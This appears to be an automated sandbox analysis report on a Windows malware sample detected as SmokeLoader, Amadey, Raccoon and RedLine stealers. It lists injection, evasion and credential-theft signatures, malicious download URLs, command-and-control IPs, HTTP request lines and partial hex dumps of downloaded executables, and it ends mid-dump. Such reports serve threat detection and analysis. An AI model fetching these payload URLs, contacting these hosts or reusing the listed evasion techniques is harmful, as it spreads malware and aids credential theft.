Windows Analysis Report F7E3DjYJpC.exe

Overview

General Information

Sample Name: F7E3DjYJpC.exe
Analysis ID: 511974
MD5: 537ad79dd97c59fcd1df5d8a26256192
SHA1: 7d43f8a6c25934e4299316ad7c9c8e8ce61416e3
SHA256: 17bb183c9e8f262c2bd91228e788f4613279c795573b558c3981501ee02811ba
Tags: DofoilexeSmokeLoader
Infos:

Most interesting Screenshot:

Detection

Amadey Raccoon RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Early bird code injection technique detected
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
DLL reload attack detected
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://telegalive.top/T# Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe Avira URL Cloud: Label: malware
Source: http://telegalive.top/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Multi AV Scanner detection for submitted file
Source: F7E3DjYJpC.exe Virustotal: Detection: 28% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\20BD.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\3C84.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\3D90.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\46D6.exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\69B.exe ReversingLabs: Detection: 39%
Machine Learning detection for sample
Source: F7E3DjYJpC.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\iwbavbe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5483.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2CF4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\16BC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\39A7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1254.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\69B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ssbavbe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\abbavbe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3D90.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 13.0.iwbavbe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.5.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 26.0.31F4.exe.400000.7.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 13.0.iwbavbe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.iwbavbe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.13.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 26.0.31F4.exe.400000.17.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 32.0.iwbavbe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.15.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 32.0.iwbavbe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.iwbavbe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.0.iwbavbe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.9.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 4.0.F7E3DjYJpC.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.31F4.exe.400000.11.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 13.0.iwbavbe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.F7E3DjYJpC.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49841 version: TLS 1.0
Uses 32bit PE files
Source: F7E3DjYJpC.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: 20BD.exe, 00000014.00000002.863191806.0000000000417000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 31F4.exe, 00000016.00000002.938495921.0000000003625000.00000004.00000001.sdmp, 31F4.exe, 0000001A.00000000.887030697.0000000000400000.00000040.00000001.sdmp, 31F4.exe, 00000024.00000000.938689458.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.851564916.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp
Source: Binary string: c C:\rudiletama-43\bano.pdbp source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 20BD.exe, 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: 20BD.exe
Source: Binary string: C:\rudiletama-43\bano.pdb source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source: Binary string: NC:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then add dword ptr [ebp-5Ch], 01h 23_2_01140520
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then jmp 0114100Dh 23_2_01140DD0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 23_2_011491D8
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 23_2_011491CC
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 4x nop then jmp 0114100Dh 23_2_01140DC0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49865 -> 91.219.236.97:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 185.215.113.45:80
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 185.215.113.45:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:49:30 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:49:02 GMTETag: "54600-5cf8247e1cc68"Accept-Ranges: bytesContent-Length: 345600Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 8d a1 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c4 03 00 00 c4 70 02 00 00 00 00 d0 c9 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 cc b6 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 c8 03 00 50 00 00 00 00 60 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 be 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 48 c3 03 00 00 10 00 00 00 c4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 e0 03 00 00 16 00 00 00 c8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 6f 70 61 62 61 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 60 73 02 00 40 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 a0 73 02 00 24 01 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:50:10 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:50:02 GMTETag: "92a00-5cf824b80192b"Accept-Ranges: bytesContent-Length: 600576Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 82 db 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a8 07 00 00 c4 70 02 00 00 00 00 80 ad 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 9c b6 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 ab 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 38 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 a2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 a6 07 00 00 10 00 00 00 a8 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 69 77 65 72 00 00 e5 02 00 00 00 30 77 02 00 04 00 00 00 c2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 80 77 02 00 24 01 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:50:40 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:50:44 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 18:50:02 GMTETag: "d6000-5cf824b7e7878"Accept-Ranges: bytesContent-Length: 876544Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 55 19 94 43 34 77 c7 43 34 77 c7 43 34 77 c7 2c 42 dc c7 6e 34 77 c7 2c 42 e9 c7 61 34 77 c7 2c 42 dd c7 3c 34 77 c7 4a 4c e4 c7 44 34 77 c7 43 34 76 c7 3d 34 77 c7 2c 42 d8 c7 42 34 77 c7 2c 42 ed c7 42 34 77 c7 2c 42 ea c7 42 34 77 c7 